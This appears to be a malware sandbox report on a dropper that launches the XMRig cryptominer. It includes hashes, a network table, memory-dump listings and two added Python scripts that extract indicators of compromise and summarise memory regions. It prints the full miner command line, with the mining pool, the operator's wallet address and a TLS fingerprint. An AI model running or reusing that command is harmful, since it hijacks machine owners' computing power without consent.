SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4012-14-0x0000016BA2910000-0x0000016BA2930000-memory.dmp

memory/4012-15-0x0000016BA2970000-0x0000016BA2990000-memory.dmp

memory/4012-16-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-18-0x0000016BA29B0000-0x0000016BA29D0000-memory.dmp

memory/4012-17-0x0000016BA2990000-0x0000016BA29B0000-memory.dmp

memory/4012-19-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-20-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-23-0x0000016BA29B0000-0x0000016BA29D0000-memory.dmp

memory/4012-22-0x0000016BA2990000-0x0000016BA29B0000-memory.dmp

memory/4012-21-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-24-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-25-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-26-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-27-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-28-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-29-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-30-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-31-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-32-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-33-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-34-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-35-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-36-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-37-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-38-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-39-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-40-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-41-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-42-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-43-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-44-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-45-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-46-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-47-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-48-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-49-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-50-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-51-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-52-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-53-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-54-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-55-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-56-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-57-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-58-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-59-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-60-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-61-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-62-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-63-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-64-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-65-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-66-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-67-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-68-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-69-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-70-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-71-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-72-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-73-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-74-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-75-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-76-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-77-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-78-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-79-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-80-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-81-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

memory/4012-82-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1785s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner

Description Indicator Process Target
(64 matches reported; description, indicator, process and target are all N/A in this export)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1052 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
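The command line above carries every indicator a responder needs: the stratum pool and port, the operator's wallet, the donate level, and a pinned TLS fingerprint. The following script, added here as a worked example rather than code from the report or from XMRig, parses an XMRig-style command line into those fields, sanity-checks the wallet against the Monero base58 address format (95 characters, leading 4 or 8, no 0/O/I/l), and correlates the pool host and port against rows copied from the Network table of this detonation. The function and class names are my own; the inputs are the report's, embedded inline so the script runs offline. Note that xmrig accepts both long and short forms for its options, and `parse_known_args` lets the parser tolerate flags this example does not model.

```python
"""Extract miner IOCs from an XMRig-style command line and correlate them
with the sandbox network table.  Added example; the command line and the
network rows are copied from the behavioral20 report, the code is mine."""
import argparse
import re
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

# Command line as recorded for PID 2688 in this detonation.
XMRIG_CMDLINE = (
    r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Three rows from the Network table (Country Destination Domain Proto).
NETWORK_TABLE = """\
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
"""

# Monero base58 alphabet omits 0, O, I and l.  Standard addresses are 95
# characters starting with 4; subaddresses are 95 characters starting with 8.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


@dataclass
class MinerIOCs:
    pool_host: str
    pool_port: int
    wallet: str
    wallet_is_monero: bool
    tls: bool
    tls_fingerprint: Optional[str]
    donate_level: Optional[int]
    network_hits: List[dict] = field(default_factory=list)


def parse_xmrig_cmdline(cmdline: str) -> MinerIOCs:
    # posix=False keeps the backslash in xmrig-6.21.0\xmrig.exe intact.
    tokens = shlex.split(cmdline, posix=False)[1:]
    ap = argparse.ArgumentParser(add_help=False)
    ap.add_argument("-o", "--url", required=True)
    ap.add_argument("-u", "--user", default="")
    ap.add_argument("-p", "--pass", dest="password", default="")
    ap.add_argument("--donate-level", type=int, default=None)
    ap.add_argument("--tls", action="store_true")
    ap.add_argument("--tls-fingerprint", default=None)
    args, _unknown = ap.parse_known_args(tokens)  # ignore flags not modelled here

    url = re.sub(r"^stratum\+(tcp|ssl)://", "", args.url)  # strip scheme if given
    host, _, port = url.rpartition(":")
    if not host:                      # no explicit port: xmrig's default is 3333
        host, port = url, "3333"
    return MinerIOCs(
        pool_host=host,
        pool_port=int(port),
        wallet=args.user,
        wallet_is_monero=bool(MONERO_ADDR.match(args.user)),
        tls=args.tls,
        tls_fingerprint=args.tls_fingerprint,
        donate_level=args.donate_level,
    )


def correlate_network(iocs: MinerIOCs, table: str) -> MinerIOCs:
    """Attach the TCP rows whose domain and port match the pool in the command line."""
    for line in table.splitlines():
        country, dest, domain, proto = line.split()
        ip, _, port = dest.rpartition(":")
        if domain == iocs.pool_host and proto == "tcp" and int(port) == iocs.pool_port:
            iocs.network_hits.append({"country": country, "ip": ip, "port": int(port)})
    return iocs


def analyze(cmdline: str = XMRIG_CMDLINE, table: str = NETWORK_TABLE) -> MinerIOCs:
    return correlate_network(parse_xmrig_cmdline(cmdline), table)


if __name__ == "__main__":
    r = analyze()
    print(f"pool {r.pool_host}:{r.pool_port} tls={r.tls} fingerprint={r.tls_fingerprint}")
    print(f"wallet {r.wallet[:12]}... monero_format={r.wallet_is_monero} donate={r.donate_level}")
    for hit in r.network_hits:
        print(f"stratum connection seen: {hit['ip']}:{hit['port']} ({hit['country']})")
```

Run against the report's data it resolves the pool to the DE host 45.76.89.70:80 from the Network table, which is the one TCP flow that is not Windows or GitHub background traffic. The wallet and the pinned TLS fingerprint are the most durable indicators here: the dropper name, the pool host and the sandbox IP can all change between campaigns without the operator touching either.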

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 200.64.52.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2688-14-0x000001AA331D0000-0x000001AA331F0000-memory.dmp

memory/2688-15-0x000001AA33200000-0x000001AA33220000-memory.dmp

memory/2688-16-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-17-0x000001AA33240000-0x000001AA33260000-memory.dmp

memory/2688-18-0x000001AA33220000-0x000001AA33240000-memory.dmp

memory/2688-19-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-20-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-23-0x000001AA33220000-0x000001AA33240000-memory.dmp

memory/2688-22-0x000001AA33240000-0x000001AA33260000-memory.dmp

memory/2688-21-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-24-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-25-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-26-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-27-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-28-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-29-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-30-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-31-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-32-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-33-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-34-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-35-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-36-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-37-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-38-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-39-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-40-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-41-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-42-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-43-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-44-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-45-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-46-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-47-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-48-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-49-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-50-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-51-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-52-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-53-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-54-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-55-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-56-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-57-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-58-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-59-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-60-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-61-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-62-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-63-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-64-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-65-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-66-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-67-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-68-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-69-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-70-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-71-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-72-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-73-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-74-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-75-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-76-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-77-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-78-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-79-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-80-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-81-0x00007FF781030000-0x00007FF781B33000-memory.dmp

memory/2688-82-0x00007FF781030000-0x00007FF781B33000-memory.dmp
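The memory dump lists in this report repeat the same few regions dozens of times, once per snapshot. The script below, an added example and not part of the report or of any sandbox tooling, collapses such a listing into unique (PID, start, end) regions with their size and snapshot count, and then looks for image-sized regions that recur across processes. The classification of a region as an image versus a heap allocation is a heuristic I assume here (64-bit Windows 10 loads EXE images into the 0x7FF6..0x7FFF range, small 0x20000-byte regions low in the address space are heap), not something the report states. The sample listing is a constructed subset of the PID 4012 and PID 2688 entries above.

```python
"""Collapse a sandbox memory-dump listing into unique regions and find the
same image mapped in more than one process.  Added example with constructed
input taken from the memory/ entries of this report."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed subset of the report's dump names (PID 4012 and PID 2688).
MEMORY_DUMPS = """\
memory/4012-21-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp
memory/4012-82-0x00007FF7C5F60000-0x00007FF7C6A63000-memory.dmp
memory/2688-14-0x000001AA331D0000-0x000001AA331F0000-memory.dmp
memory/2688-15-0x000001AA33200000-0x000001AA33220000-memory.dmp
memory/2688-16-0x00007FF781030000-0x00007FF781B33000-memory.dmp
memory/2688-17-0x000001AA33240000-0x000001AA33260000-memory.dmp
memory/2688-18-0x000001AA33220000-0x000001AA33240000-memory.dmp
memory/2688-19-0x00007FF781030000-0x00007FF781B33000-memory.dmp
memory/2688-82-0x00007FF781030000-0x00007FF781B33000-memory.dmp
"""

DUMP_RE = re.compile(
    r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp"
)


def summarize_regions(listing: str) -> List[dict]:
    """One record per distinct (pid, start, end), with size and snapshot count."""
    regions: Dict[tuple, dict] = {}
    for m in DUMP_RE.finditer(listing):
        pid, seq = int(m.group(1)), int(m.group(2))
        start, end = int(m.group(3), 16), int(m.group(4), 16)
        rec = regions.setdefault((pid, start, end), {
            "pid": pid, "start": start, "end": end, "size": end - start,
            "snapshots": 0, "first_seq": seq, "last_seq": seq,
        })
        rec["snapshots"] += 1
        rec["first_seq"] = min(rec["first_seq"], seq)
        rec["last_seq"] = max(rec["last_seq"], seq)
    return sorted(regions.values(), key=lambda r: (r["pid"], r["start"]))


def classify(region: dict) -> str:
    # Heuristic (assumption): 64-bit image bases on Windows 10 sit just below
    # 0x800000000000; everything lower in this listing is heap/private memory.
    if 0x7FF000000000 <= region["start"] < 0x800000000000:
        return "image"
    return "heap/private"


def shared_image_sizes(regions: List[dict]) -> Dict[int, List[int]]:
    """Image-range regions of identical size in different PIDs: the same
    executable mapped at different ASLR bases."""
    by_size = defaultdict(set)
    for r in regions:
        if classify(r) == "image":
            by_size[r["size"]].add(r["pid"])
    return {size: sorted(pids) for size, pids in by_size.items() if len(pids) > 1}


if __name__ == "__main__":
    regs = summarize_regions(MEMORY_DUMPS)
    for r in regs:
        print(f"pid {r['pid']} 0x{r['start']:016X}-0x{r['end']:016X} "
              f"size 0x{r['size']:X} {classify(r):13s} snapshots={r['snapshots']} "
              f"seq {r['first_seq']}..{r['last_seq']}")
    for size, pids in shared_image_sizes(regs).items():
        print(f"image of 0x{size:X} bytes mapped in PIDs {pids}")
```

On the full listing the output is two facts the raw dump names hide: the PID 2688 image region 0x00007FF781030000-0x00007FF781B33000 and the PID 4012 image region 0x00007FF7C5F60000-0x00007FF7C6A63000 are both exactly 0xB03000 bytes, consistent with the same xmrig.exe image relocated by ASLR, and the four 0x20000-byte regions near 0x1AA33xxxxxx are short-lived heap allocations that stop being dumped after the first few snapshots.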